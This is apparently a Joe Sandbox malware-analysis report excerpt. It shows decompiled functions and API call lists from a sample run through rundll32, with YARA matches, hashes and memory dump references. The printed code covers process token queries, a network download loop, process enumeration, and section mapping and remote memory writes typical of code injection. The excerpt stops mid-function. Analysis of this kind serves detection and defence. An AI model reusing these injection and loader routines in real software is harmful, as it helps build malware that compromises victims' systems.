                                          • Opcode ID: cf38622d9a1d2be6fdc24747cd26048b7917e38c3bf390df81e22acd2bf9ad5f
                                          • Instruction ID: 7c9b7c54debbaa8649cdafbb5cf7dc9b8b8003b8a125100a1dae0842518b7c1e
                                          • Opcode Fuzzy Hash: cf38622d9a1d2be6fdc24747cd26048b7917e38c3bf390df81e22acd2bf9ad5f
                                          • Instruction Fuzzy Hash: 49311672904216BFDB10AF78AC89E6E77E8EB04712B5504F5EE16E35A0DB308CD88F50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894695 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E04894695(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04894DF6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04894C73(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x048946a2
                                          0x048946a3
                                          0x048946a4
                                          0x048946a5
                                          0x048946a6
                                          0x048946aa
                                          0x048946b1
                                          0x048946c0
                                          0x048946c3
                                          0x048946c6
                                          0x048946cd
                                          0x048946d0
                                          0x048946d3
                                          0x048946d6
                                          0x048946d9
                                          0x048946e4
                                          0x048946e6
                                          0x048946ef
                                          0x048946f7
                                          0x048946f9
                                          0x0489470b
                                          0x04894715
                                          0x04894719
                                          0x04894728
                                          0x0489472c
                                          0x04894735
                                          0x0489473d
                                          0x0489473d
                                          0x0489473f
                                          0x0489473f
                                          0x04894747
                                          0x0489474d
                                          0x04894751
                                          0x04894751
                                          0x0489475c

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 048946DC
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 048946EF
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0489470B
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04894728
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04894735
                                          • NtClose.NTDLL(?), ref: 04894747
                                          • NtClose.NTDLL(00000000), ref: 04894751
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 6cc1232acd83a91c107ed80fb8574eda74dbc96ff8db7571f78960558e58bd21
                                          • Instruction ID: e73c2073e20d9518b56a0a6026a78dfcf4f11f845486fb2e79a2ba6df8dfbfb4
                                          • Opcode Fuzzy Hash: 6cc1232acd83a91c107ed80fb8574eda74dbc96ff8db7571f78960558e58bd21
                                          • Instruction Fuzzy Hash: 822119B190062CBBDF01AF98DC459DEBFBDEF08B40F144526F905E6210D7B19E459BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B712F1 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 00B71338
                                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 00B7134B
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 00B71367
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 00B71384
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 00B71391
                                          • NtClose.NTDLL(?), ref: 00B713A3
                                          • NtClose.NTDLL(?), ref: 00B713AD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 3ea42ecee9ca9985f94d094edf19ed29e385e6fdee5404d52184cee37650ae7f
                                          • Instruction ID: 4bb9ca7af43d629777933fa89bf6a7cb5da4a3765504a47034537c5188a1cf70
                                          • Opcode Fuzzy Hash: 3ea42ecee9ca9985f94d094edf19ed29e385e6fdee5404d52184cee37650ae7f
                                          • Instruction Fuzzy Hash: F7213972910218BFDB01AF99CC45EDEBFBDEF08741F108066F909E6121D7719A549BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5CF88 Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.NTDLL(?,?,00000004,?,?,00B6A412,00B6A412,00B6A412,?,?,?,00000000,00000000), ref: 00B5D101
                                            • Part of subcall function 00B5A5C0: GetModuleHandleA.KERNEL32(?,?,?,00B5D1BF,?,?,00000000,00000000), ref: 00B5A5FE
                                            • Part of subcall function 00B5A5C0: memcpy.NTDLL(?,00B7932C,00000018,?,?,?), ref: 00B5A67A
                                          • memcpy.NTDLL(?,?,00000018,?,?,00B6A412,00B6A412,00B6A412,?,?,?,00000000,00000000), ref: 00B5D14F
                                          • memcpy.NTDLL(?,00B53BC6,00000800,?,?,00000000,00000000), ref: 00B5D1D2
                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 00B5D210
                                          • NtClose.NTDLL(00000000,00000000,00000000), ref: 00B5D237
                                            • Part of subcall function 00B646C8: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,00B5D0A2,?,?,?,00000000,00000000), ref: 00B646ED
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B6470F
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B64725
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B6473B
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B64751
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B64767
                                            • Part of subcall function 00B594A5: NtMapViewOfSection.NTDLL(00000000,000000FF,00B5DE51,00000000,00000000,00B5DE51,00000000,00000002,00000000,?,?,00000000,00B5DE51,000000FF,00000000), ref: 00B594D3
                                            • Part of subcall function 00B5C000: memcpy.NTDLL(?,?,00000000,?,?,00001003,00B6A412,00B6A412,?,?,?,00000000,00000000), ref: 00B5C074
                                            • Part of subcall function 00B5C000: memcpy.NTDLL(00000000,?,?), ref: 00B5C0DB
                                          • memset.NTDLL ref: 00B5D252
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                                          • String ID:
                                          • API String ID: 3674896251-0
                                          • Opcode ID: f6343b7b7c922e50db068a0d0754d48824d7acfcb32e253241d9f2e231d5ae26
                                          • Instruction ID: 6681df617d20785f45db0a8f2baba4d025f3c486151ff4e10c533beb98538fe3
                                          • Opcode Fuzzy Hash: f6343b7b7c922e50db068a0d0754d48824d7acfcb32e253241d9f2e231d5ae26
                                          • Instruction Fuzzy Hash: 8EA1597190060AEFDB21DF98C884BAEBBF5FF04305F1446E9E800A7251E735EA59DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894CC6 Relevance: 9.1, APIs: 6, Instructions: 112filenetworkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E04894CC6(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				int _t43;
				long _t45;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x489a174(0, 1,  &_v12); // executed
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04894DF6(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_t43 = InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8); // executed
						if(_t43 != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04894C73(_v16);
							if(_t58 == 0) {
								_t45 = E048956EC(_v12, _t59); // executed
								_t58 = _t45;
							}
							goto L18;
						}
						_t58 = E04893A6F( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04893A6F( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}
















                                          0x04894cc6
                                          0x04894cd5
                                          0x04894cda
                                          0x04894cdc
                                          0x04894cf3
                                          0x04894d24
                                          0x04894d29
                                          0x04894dec
                                          0x04894def
                                          0x04894df5
                                          0x04894df5
                                          0x04894d36
                                          0x04894d3e
                                          0x04894de9
                                          0x00000000
                                          0x04894de9
                                          0x04894d49
                                          0x04894d4e
                                          0x04894d53
                                          0x04894ddb
                                          0x04894ddc
                                          0x04894ddc
                                          0x04894de2
                                          0x00000000
                                          0x04894de2
                                          0x04894d59
                                          0x04894d5b
                                          0x04894d61
                                          0x04894d62
                                          0x04894d62
                                          0x04894d65
                                          0x04894d68
                                          0x04894d6e
                                          0x04894d7f
                                          0x04894d87
                                          0x00000000
                                          0x00000000
                                          0x04894d8f
                                          0x04894d97
                                          0x04894dc0
                                          0x04894dc3
                                          0x04894dca
                                          0x04894dd0
                                          0x04894dd5
                                          0x04894dd5
                                          0x00000000
                                          0x04894dca
                                          0x04894da3
                                          0x04894da7
                                          0x00000000
                                          0x00000000
                                          0x04894da9
                                          0x04894dae
                                          0x00000000
                                          0x00000000
                                          0x04894db0
                                          0x04894db0
                                          0x04894db5
                                          0x00000000
                                          0x00000000
                                          0x04894db7
                                          0x04894db8
                                          0x04894dbb
                                          0x04894dbb
                                          0x04894d62
                                          0x04894cfb
                                          0x04894d03
                                          0x04894d1c
                                          0x04894d1e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04894d1e
                                          0x04894d0f
                                          0x04894d13
                                          0x00000000
                                          0x00000000
                                          0x04894d19
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04894CDC
                                          • InternetReadFile.WININET(?,?,00000004,?), ref: 04894CEB
                                          • GetLastError.KERNEL32 ref: 04894CF5
                                            • Part of subcall function 04893A6F: WaitForMultipleObjects.KERNEL32(00000002,04897B35,00000000,04897B35,?,?,?,04897B35,0000EA60), ref: 04893A8A
                                          • ResetEvent.KERNEL32(?), ref: 04894D6E
                                          • InternetReadFile.WININET(?,?,00001000,?), ref: 04894D7F
                                          • GetLastError.KERNEL32 ref: 04894D89
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 3290165071-0
                                          • Opcode ID: 40d4f98ea8419a432f4e88f994fc2dbee03f59495e4f9c745ef79659c26609df
                                          • Instruction ID: 64acd6f597f6ba15a6dbe90e9448e63b1b8f3fa5eff45eab67e08b5fa49a41ce
                                          • Opcode Fuzzy Hash: 40d4f98ea8419a432f4e88f994fc2dbee03f59495e4f9c745ef79659c26609df
                                          • Instruction Fuzzy Hash: E631923A604E04BFDF22AFA4DC44A6E77F9EF84A54F1C0A68E512D7190EA70FD428750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65CA1 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B65CCC
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00B65CD9
                                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00B65D65
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00B65D70
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B65D79
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B65D8E
                                            • Part of subcall function 00B6199F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B65D07,?), ref: 00B619A7
                                            • Part of subcall function 00B6199F: GetVersion.KERNEL32 ref: 00B619B6
                                            • Part of subcall function 00B6199F: GetCurrentProcessId.KERNEL32 ref: 00B619D2
                                            • Part of subcall function 00B6199F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00B619EF
                                            • Part of subcall function 00B5685A: memcpy.NTDLL(00000000,?,?,?), ref: 00B568B9
                                            • Part of subcall function 00B53AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B6A192), ref: 00B53B11
                                            • Part of subcall function 00B54345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B54366
                                            • Part of subcall function 00B54345: GetProcAddress.KERNEL32(00000000,?), ref: 00B5437F
                                            • Part of subcall function 00B54345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?), ref: 00B5439C
                                            • Part of subcall function 00B54345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000), ref: 00B543AD
                                            • Part of subcall function 00B54345: FindCloseChangeNotification.KERNEL32(?,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B543C0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                          • String ID:
                                          • API String ID: 2581485877-0
                                          • Opcode ID: fb5ce00df943cb3c050487706bb0b587b0e84287e81a5ff11a095409d67a8792
                                          • Instruction ID: 94345198f8f95792f8f1f39259028741f938535c006162c93cf1eaf2355d0518
                                          • Opcode Fuzzy Hash: fb5ce00df943cb3c050487706bb0b587b0e84287e81a5ff11a095409d67a8792
                                          • Instruction Fuzzy Hash: 1831D631900614AFC721AF64DC88EAE77F4FB44755F1045B8F65AEB191DB348D54CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896DB6 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04896DB6() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x489a348; // 0x9ad5a8
						_t2 = _t9 + 0x489bea8; // 0x73617661
						_push( &_v264);
						if( *0x489a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                          0x04896dc1
                                          0x04896dc6
                                          0x04896dcb
                                          0x04896dcf
                                          0x04896dd9
                                          0x04896e0a
                                          0x04896de0
                                          0x04896de5
                                          0x04896df2
                                          0x04896dfb
                                          0x04896e12
                                          0x04896dfd
                                          0x04896e05
                                          0x00000000
                                          0x04896e05
                                          0x04896e13
                                          0x04896e14
                                          0x00000000
                                          0x04896e14
                                          0x00000000
                                          0x04896e0e
                                          0x04896e1a
                                          0x04896e1f

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04896DC6
                                          • Process32First.KERNEL32(00000000,?), ref: 04896DD9
                                          • Process32Next.KERNEL32(00000000,?), ref: 04896E05
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04896E14
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3243318325-0
                                          • Opcode ID: bd1c4caafdf1701b781d5050357aaab8484799760f062c7fd4e9157be0abb7a4
                                          • Instruction ID: a13f8f4ca68ee0460900eef52c6f6994a7f88bf941c02a061a1a32c727dce0e1
                                          • Opcode Fuzzy Hash: bd1c4caafdf1701b781d5050357aaab8484799760f062c7fd4e9157be0abb7a4
                                          • Instruction Fuzzy Hash: 1AF0F672A009196ADF21A62ADC08EEF33ECDB85358F0C0A51FD05E2000FB34ED5586A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5DDDD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000), ref: 00B5DE3A
                                            • Part of subcall function 00B594A5: NtMapViewOfSection.NTDLL(00000000,000000FF,00B5DE51,00000000,00000000,00B5DE51,00000000,00000002,00000000,?,?,00000000,00B5DE51,000000FF,00000000), ref: 00B594D3
                                          • memset.NTDLL ref: 00B5DE5E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: f947fb31bfdfe2961369438c790e1a574dcfabbf8a651ae8b251e28d28633cf0
                                          • Instruction ID: e27f583533061916c3852d7ddca434684278628c165cff111e72ff31b50cde4d
                                          • Opcode Fuzzy Hash: f947fb31bfdfe2961369438c790e1a574dcfabbf8a651ae8b251e28d28633cf0
                                          • Instruction Fuzzy Hash: BE213BB2D00209AFDB11DFA9C8819EEFBF9EB48350F1045A9E615F7210D770AA498B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B644A5 Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(?,00000318), ref: 00B644CA
                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B644E6
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                            • Part of subcall function 00B51C78: GetProcAddress.KERNEL32(?), ref: 00B51CA1
                                            • Part of subcall function 00B51C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 00B51CC3
                                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 00B64650
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                          • String ID:
                                          • API String ID: 3547194813-0
                                          • Opcode ID: e82c0e490ff935ff425be73ca1637d087dc1270d68e6a5d582f532facd057636
                                          • Instruction ID: 00b8e857f1de995afa0a4c8f4450d8d67f5d4d15ff21ba9a7784afdfae0972ac
                                          • Opcode Fuzzy Hash: e82c0e490ff935ff425be73ca1637d087dc1270d68e6a5d582f532facd057636
                                          • Instruction Fuzzy Hash: FF614171A0061AAFDF15DF94C880BEEB7F4FF09304F1045A9E909AB251DB74E954CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6F5FF Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B6F613
                                          • GetProcAddress.KERNEL32(?), ref: 00B6F63B
                                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 00B6F659
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressInformationProcProcess64QueryWow64memset
                                          • String ID:
                                          • API String ID: 2968673968-0
                                          • Opcode ID: 895dc4ac5a055073d0cf2463350efab55c04ac8b415e56f5877161c135f83b33
                                          • Instruction ID: e2bcfd89e2cdc66da50d96aa983d7a94f64be085700e88d954c68ddcfc236548
                                          • Opcode Fuzzy Hash: 895dc4ac5a055073d0cf2463350efab55c04ac8b415e56f5877161c135f83b33
                                          • Instruction Fuzzy Hash: DF117331A0411AAFDB10DB54DC49FA97BE9EB45700F054069FD08EB2A0DB74ED05CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6AD9E Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00B57A68,00000000,00000000,00B57A68,00003000,00000040), ref: 00B6ADCF
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B6ADD6
                                          • SetLastError.KERNEL32(00000000), ref: 00B6ADDD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$AllocateLastMemoryStatusVirtual
                                          • String ID:
                                          • API String ID: 722216270-0
                                          • Opcode ID: 585d0d89600aa7f1f04b8e0bcabd5b971c6ef0b789e1cc5c79c1b7bfea11dfb3
                                          • Instruction ID: 799d626cebd668526b3b8abc7b8a70b1892612ff393402a81babfac7f83f9309
                                          • Opcode Fuzzy Hash: 585d0d89600aa7f1f04b8e0bcabd5b971c6ef0b789e1cc5c79c1b7bfea11dfb3
                                          • Instruction Fuzzy Hash: 10F0FE71521309FBEB05CBD5DD09BAE76BCEB14346F104058B604E7080EBB4AB44DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B628 Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,00001003,00B57B0A,00000000,?,00B57B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003), ref: 00B6B646
                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B6B655
                                          • SetLastError.KERNEL32(00000000,?,00B57B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003,?,00000318,00000008), ref: 00B6B65C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$LastMemoryStatusVirtualWrite
                                          • String ID:
                                          • API String ID: 1089604434-0
                                          • Opcode ID: 56cb82cd8f12da10e574d5d01bc77b93918209be51c48a5e07dca6f98bb2609b
                                          • Instruction ID: 7a4d176695ec5dab6cce3cb998b3f59a4c1e37b4d0582dce4c81c02593f3ca56
                                          • Opcode Fuzzy Hash: 56cb82cd8f12da10e574d5d01bc77b93918209be51c48a5e07dca6f98bb2609b
                                          • Instruction Fuzzy Hash: 5DE0BF3320021AABCF015FE9EC08D9ABBA9FB19751B008461BE15D3131DB35D9B1ABE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048925D7 Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E048925D7(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
